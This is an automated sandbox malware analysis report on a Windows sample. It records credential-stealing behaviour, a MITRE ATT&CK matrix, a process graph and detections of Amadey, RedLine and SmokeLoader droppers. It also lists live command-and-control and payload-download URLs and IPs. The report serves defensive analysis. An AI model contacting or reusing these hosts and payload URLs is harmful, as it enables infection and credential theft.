                                Source: Yara matchFile source: 00000027.00000002.841905770.0000000000DE1000.00000020.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000000.482993815.0000000001171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000002.530647017.0000000000FB1000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.477078965.0000000001041000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000000.499470322.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000000.499779056.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000000.497313397.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000000.499951852.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000027.00000000.514204840.0000000000DE1000.00000020.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.845677508.00000000009C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000000.513749349.0000000000341000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: nbveek.exe PID: 5324, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Amadey.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Legno[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\8C99.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\6267.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\8FF5.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\65C3.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dll, type: DROPPED
                                Source: Yara matchFile source: 20.2.79AB.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.79AB.exe.690e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.3.79AB.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000014.00000002.531842055.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.448139316.0000000003041000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.434102717.0000000004611000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.447824560.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.531330257.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.505331035.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 00000026.00000002.843894856.000000000098A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.847247347.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.837145100.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.846974076.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.719800807.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000027.00000002.837962620.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.720284634.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: nbveek.exe PID: 5324, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                                Source: Yara matchFile source: Process Memory Space: anon.exe PID: 1700, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dll, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 31.2.nbveek.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.0.anon.exe.7d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000F.00000003.499378760.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.569124856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000000.496552203.00000000007D2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.846222644.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: anon.exe PID: 1700, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe, type: DROPPED
                                Source: Yara matchFile source: 20.2.79AB.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.79AB.exe.690e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.3.79AB.exe.2080000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000014.00000002.531842055.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.448139316.0000000003041000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.434102717.0000000004611000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.447824560.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.531330257.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.505331035.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                Valid Accounts1
                                Shared Modules
                                1
                                DLL Side-Loading
                                1
                                Exploitation for Privilege Escalation
                                1
                                Disable or Modify Tools
                                1
                                OS Credential Dumping
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                Exfiltration Over Other Network Medium14
                                Ingress Tool Transfer
                                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                                Default Accounts1
                                Exploitation for Client Execution
                                1
                                Scheduled Task/Job
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                1
                                Input Capture
                                1
                                Account Discovery
                                Remote Desktop Protocol1
                                Data from Local System
                                Exfiltration Over Bluetooth11
                                Encrypted Channel
                                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain Accounts1
                                Scheduled Task/Job
                                1
                                Registry Run Keys / Startup Folder
                                612
                                Process Injection
                                21
                                Obfuscated Files or Information
                                2
                                Credentials in Registry
                                2
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Email Collection
                                Automated Exfiltration1
                                Non-Standard Port
                                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local AccountsAt (Windows)1
                                Services File Permissions Weakness
                                1
                                Scheduled Task/Job
                                11
                                Software Packing
                                1
                                Credentials In Files
                                26
                                System Information Discovery
                                Distributed Component Object Model1
                                Input Capture
                                Scheduled Transfer4
                                Non-Application Layer Protocol
                                SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon Script1
                                Registry Run Keys / Startup Folder
                                1
                                Timestomp
                                LSA Secrets1
                                Query Registry
                                SSHKeyloggingData Transfer Size Limits115
                                Application Layer Protocol
                                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.common1
                                Services File Permissions Weakness
                                1
                                DLL Side-Loading
                                Cached Domain Credentials441
                                Security Software Discovery
                                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                                File Deletion
                                DCSync2
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                                Masquerading
                                Proc Filesystem131
                                Virtualization/Sandbox Evasion
                                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)131
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadow1
                                Application Window Discovery
                                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)612
                                Process Injection
                                Network Sniffing1
                                System Owner/User Discovery
                                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                                Hidden Files and Directories
                                Input Capture1
                                Remote System Discovery
                                Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                                Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                                Services File Permissions Weakness
                                KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                                Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled Task1
                                Rundll32
                                GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 778231 Sample: Ej3vSx3p8Y.exe Startdate: 05/01/2023 Architecture: WINDOWS Score: 100 144 Snort IDS alert for network traffic 2->144 146 Malicious sample detected (through community Yara rule) 2->146 148 Antivirus detection for URL or domain 2->148 150 15 other signatures 2->150 12 Ej3vSx3p8Y.exe 2->12         started        15 fgifwju 2->15         started        process3 signatures4 194 Detected unpacking (changes PE section rights) 12->194 196 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->196 198 Maps a DLL or memory area into another process 12->198 204 2 other signatures 12->204 17 explorer.exe 25 12->17 injected 200 Multi AV Scanner detection for dropped file 15->200 202 Machine Learning detection for dropped file 15->202 process5 dnsIp6 126 62.204.41.145, 49738, 49745, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 17->126 128 vatra.at 222.236.49.124 SKB-ASSKBroadbandCoLtdKR Korea Republic of 17->128 130 10 other IPs or domains 17->130 94 C:\Users\user\AppData\Roaming\vhifwju, PE32 17->94 dropped 96 C:\Users\user\AppData\Roaming\fgifwju, PE32 17->96 dropped 98 C:\Users\user\AppData\Local\Temp\CEE7.exe, PE32 17->98 dropped 100 11 other malicious files 17->100 dropped 162 System process connects to network (likely due to code injection or exploit) 17->162 164 Benign windows process drops PE files 17->164 166 Deletes itself after installation 17->166 168 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->168 22 6267.exe 3 17->22         started        26 8C99.exe 17->26         started        28 79AB.exe 17->28         started        30 6 other processes 17->30 file7 signatures8 process9 file10 102 C:\Users\user\AppData\Local\...\nbveek.exe, PE32 22->102 dropped 170 Multi AV Scanner detection for dropped file 22->170 172 Machine Learning detection for dropped file 22->172 174 Contains functionality to inject code into remote processes 22->174 32 nbveek.exe 24 22->32         started        104 C:\Users\user\AppData\Local\...\nbveek.exe, PE32 26->104 dropped 176 Antivirus detection for dropped file 26->176 37 nbveek.exe 26->37         started        178 Detected unpacking (changes PE section rights) 28->178 180 Maps a DLL or memory area into another process 28->180 182 Checks if the current machine is a virtual machine (disk enumeration) 28->182 184 Creates a thread in another existing process (thread injection) 28->184 106 C:\Users\user\AppData\Local\...\llpb1135.exe, PE32+ 30->106 dropped 108 C:\Users\user\AppData\Local\Temp\Amadey.exe, PE32 30->108 dropped 186 Sample uses process hollowing technique 30->186 188 Injects a PE file into a foreign processes 30->188 39 nbveek.exe 30->39         started        41 nbveek.exe 30->41         started        signatures11 process12 dnsIp13 116 62.204.41.109, 49740, 49741, 49744 TNNET-ASTNNetOyMainnetworkFI United Kingdom 32->116 118 45.66.230.123, 49742, 80 CMCSUS Germany 32->118 82 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 32->82 dropped 84 C:\Users\user\AppData\Local\Temp\...\anon.exe, PE32 32->84 dropped 86 C:\Users\user\AppData\Local\...\Legno.exe, PE32 32->86 dropped 92 3 other malicious files 32->92 dropped 152 Multi AV Scanner detection for dropped file 32->152 154 Creates an undocumented autostart registry key 32->154 156 Machine Learning detection for dropped file 32->156 160 3 other signatures 32->160 43 Legno.exe 32->43         started        47 rundll32.exe 32->47         started        50 anon.exe 32->50         started        54 3 other processes 32->54 158 Antivirus detection for dropped file 37->158 120 45.32.200.113 AS-CHOOPAUS United States 39->120 122 cdn.discordapp.com 162.159.130.233 CLOUDFLARENETUS United States 39->122 124 3 other IPs or domains 39->124 88 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 39->88 dropped 90 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32 39->90 dropped 52 schtasks.exe 39->52         started        file14 signatures15 process16 dnsIp17 114 C:\Users\user\AppData\Local\...\nbveek.exe, PE32 43->114 dropped 206 Multi AV Scanner detection for dropped file 43->206 208 Machine Learning detection for dropped file 43->208 56 nbveek.exe 43->56         started        140 192.168.2.4, 443, 49686, 49687 unknown unknown 47->140 210 System process connects to network (likely due to code injection or exploit) 47->210 212 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 47->212 214 Tries to steal Instant Messenger accounts or passwords 47->214 218 2 other signatures 47->218 142 82.115.223.15 MIDNET-ASTK-TelecomRU Russian Federation 50->142 216 Antivirus detection for dropped file 50->216 60 conhost.exe 52->60         started        62 chrome.exe 54->62         started        65 conhost.exe 54->65         started        67 conhost.exe 54->67         started        69 7 other processes 54->69 file18 signatures19 process20 dnsIp21 110 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 56->110 dropped 112 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 56->112 dropped 190 Multi AV Scanner detection for dropped file 56->190 192 Machine Learning detection for dropped file 56->192 71 schtasks.exe 56->71         started        73 cmd.exe 56->73         started        138 239.255.255.250 unknown Reserved 62->138 75 chrome.exe 62->75         started        file22 signatures23 process24 dnsIp25 78 conhost.exe 71->78         started        80 conhost.exe 73->80         started        132 part-0032.t-0009.fdv2-t-msedge.net 13.107.237.60 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 75->132 134 www.google.com 142.250.184.36 GOOGLEUS United States 75->134 136 7 other IPs or domains 75->136 process26

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                Ej3vSx3p8Y.exe69%ReversingLabsWin32.Trojan.MintZard
                                Ej3vSx3p8Y.exe53%VirustotalBrowse
                                Ej3vSx3p8Y.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\CEE7.exe100%AviraHEUR/AGEN.1234969
                                C:\Users\user\AppData\Local\Temp\1000014001\anon.exe100%AviraHEUR/AGEN.1252166
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dll100%AviraHEUR/AGEN.1233121
                                C:\Users\user\AppData\Local\Temp\AAE1.exe100%AviraHEUR/AGEN.1234969
                                C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe100%AviraHEUR/AGEN.1223914
                                C:\Users\user\AppData\Local\Temp\8C99.exe100%AviraHEUR/AGEN.1223914
                                C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll100%AviraHEUR/AGEN.1233121
                                C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll100%AviraHEUR/AGEN.1233121
                                C:\Users\user\AppData\Local\Temp\8FF5.exe100%AviraHEUR/AGEN.1223914
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll100%AviraHEUR/AGEN.1233121
                                C:\Users\user\AppData\Local\Temp\Amadey.exe100%AviraHEUR/AGEN.1223914
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe100%AviraHEUR/AGEN.1252166
                                C:\Users\user\AppData\Local\Temp\CEE7.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1000014001\anon.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\6D94.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\3320.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\llpb1135.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\7E5F.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\AAE1.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\4477.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\8C99.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\8FF5.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\65C3.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\fgifwju100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\6267.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\Amadey.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\79AB.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Legno[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Legno[1].exe69%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll88%ReversingLabsWin32.Infostealer.Decred
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dll88%ReversingLabsWin32.Infostealer.Decred
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe77%ReversingLabsByteCode-MSIL.Trojan.RedLine
                                C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe77%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe69%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\1000014001\anon.exe77%ReversingLabsByteCode-MSIL.Trojan.RedLine
                                C:\Users\user\AppData\Local\Temp\3320.exe52%ReversingLabsWin32.Ransomware.MintZard
                                C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe69%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\6267.exe88%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\65C3.exe88%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\6D94.exe77%ReversingLabsWin32.Trojan.SmokeLoader
                                C:\Users\user\AppData\Local\Temp\79AB.exe50%ReversingLabsWin32.Backdoor.Convagent
                                C:\Users\user\AppData\Local\Temp\7E5F.exe77%ReversingLabsWin32.Trojan.SmokeLoader
                                C:\Users\user\AppData\Local\Temp\8C99.exe77%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\8FF5.exe77%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\AAE1.exe88%ReversingLabsByteCode-MSIL.Downloader.ShortLoader
                                C:\Users\user\AppData\Local\Temp\Amadey.exe77%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\CEE7.exe88%ReversingLabsByteCode-MSIL.Downloader.ShortLoader
                                C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe88%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\llpb1135.exe88%ReversingLabsWin64.Trojan.Fabookie
                                C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll88%ReversingLabsWin32.Infostealer.Decred
                                C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll88%ReversingLabsWin32.Infostealer.Decred
                                C:\Users\user\AppData\Roaming\fgifwju69%ReversingLabsWin32.Trojan.MintZard
                                C:\Users\user\AppData\Roaming\vhifwju50%ReversingLabsWin32.Backdoor.Convagent
                                SourceDetectionScannerLabelLinkDownload
                                32.2.8FF5.exe.2f0000.0.unpack100%AviraHEUR/AGEN.1223914Download File
                                0.2.Ej3vSx3p8Y.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                                20.2.79AB.exe.690e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                                30.0.8C99.exe.b0000.2.unpack100%AviraHEUR/AGEN.1223914Download File
                                20.3.79AB.exe.2080000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                                32.0.8FF5.exe.2f0000.2.unpack100%AviraHEUR/AGEN.1223914Download File
                                31.2.nbveek.exe.400000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                                30.0.8C99.exe.b0000.1.unpack100%AviraHEUR/AGEN.1223914Download File
                                30.0.8C99.exe.b0000.3.unpack100%AviraHEUR/AGEN.1223914Download File
                                20.2.79AB.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                                32.0.8FF5.exe.2f0000.1.unpack100%AviraHEUR/AGEN.1223914Download File
                                30.0.8C99.exe.b0000.0.unpack100%AviraHEUR/AGEN.1223914Download File
                                0.3.Ej3vSx3p8Y.exe.2ea0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                                0.2.Ej3vSx3p8Y.exe.2d80e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                                32.0.8FF5.exe.2f0000.3.unpack100%AviraHEUR/AGEN.1223914Download File
                                32.0.8FF5.exe.2f0000.0.unpack100%AviraHEUR/AGEN.1223914Download File
                                40.0.AAE1.exe.da0000.0.unpack100%AviraHEUR/AGEN.1234960Download File
                                38.2.nbveek.exe.340000.0.unpack100%AviraHEUR/AGEN.1223914Download File
                                37.2.nbveek.exe.340000.0.unpack100%AviraHEUR/AGEN.1223914Download File
                                37.0.nbveek.exe.340000.0.unpack100%AviraHEUR/AGEN.1223914Download File
                                29.0.anon.exe.7d0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                                38.0.nbveek.exe.340000.0.unpack100%AviraHEUR/AGEN.1223914Download File
                                30.2.8C99.exe.b0000.0.unpack100%AviraHEUR/AGEN.1223914Download File
                                SourceDetectionScannerLabelLink
                                potunulit.org3%VirustotalBrowse
                                polyzi.com1%VirustotalBrowse
                                SourceDetectionScannerLabelLink
                                http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                                http://tempuri.org/0%URL Reputationsafe
                                http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                                http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                                https://degroeneuitzender.nl/systems/index.php0%URL Reputationsafe
                                http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                                https://api.ip.sb/ip0%URL Reputationsafe
                                http://62.204.41.145/fusa/bibar.exe100%URL Reputationmalware
                                http://aaa.apiaaaeg.com/check/safe0%URL Reputationsafe
                                http://vatra.at/tmp/0%URL Reputationsafe
                                http://ex3mall.com/lancer/get.php0%URL Reputationsafe
                                http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                                http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                                http://45.66.230.123/g8kdkeXs2qL/index.php%0%Avira URL Cloudsafe
                                http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                                http://aaa.apiaaaeg.com/check/?sid=166043&key=e3278a7eba82b3b135f8b31f0f4dd607100%Avira URL Cloudmalware
                                http://62.204.41.109/Nmkn5d9Dn/index.php001100%Avira URL Cloudmalware
                                http://aaa.apiaaaeg.com/check/?sid=165901&key=a41443f67962d5190dc1aed0662d1137100%Avira URL Cloudmalware
                                http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                                http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
                                http://aaa.apiaaaeg.com/check/?sid=165869&key=af816f132e2c5b454b5e2c119810721c100%Avira URL Cloudmalware
                                http://62.204.41.109/Nmkn5d9Dn/index.php100%Avira URL Cloudmalware
                                82.115.223.15:154860%Avira URL Cloudsafe
                                45.32.200.113/mBsjv2swweP/index.php100%Avira URL Cloudmalware
                                http://62.204.41.109/100%Avira URL Cloudmalware
                                http://62.204.41.109/Nmkn5d9Dn/index.phpq100%Avira URL Cloudmalware
                                https://lazydowns.com/llpb1135a.exe100%Avira URL Cloudmalware
                                http://62.204.41.109/Nmkn5d9Dn/index.phpt100%Avira URL Cloudmalware
                                http://aaa.apiaaaeg.com/check/?sid=165709&key=e0b538157820667532fc0838e561b022100%Avira URL Cloudmalware
                                http://45.66.230.123/Legno.exe#100%Avira URL Cloudmalware
                                http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                                http://45.66.230.123/g8kdkeXs2qL/index.phpZ=0%Avira URL Cloudsafe
                                http://62.204.41.109/Nmkn5d9Dn/index.phpncodeo100%Avira URL Cloudmalware
                                http://45.32.200.113/m/Nmkn5d9Dn/index.phpf100%Avira URL Cloudmalware
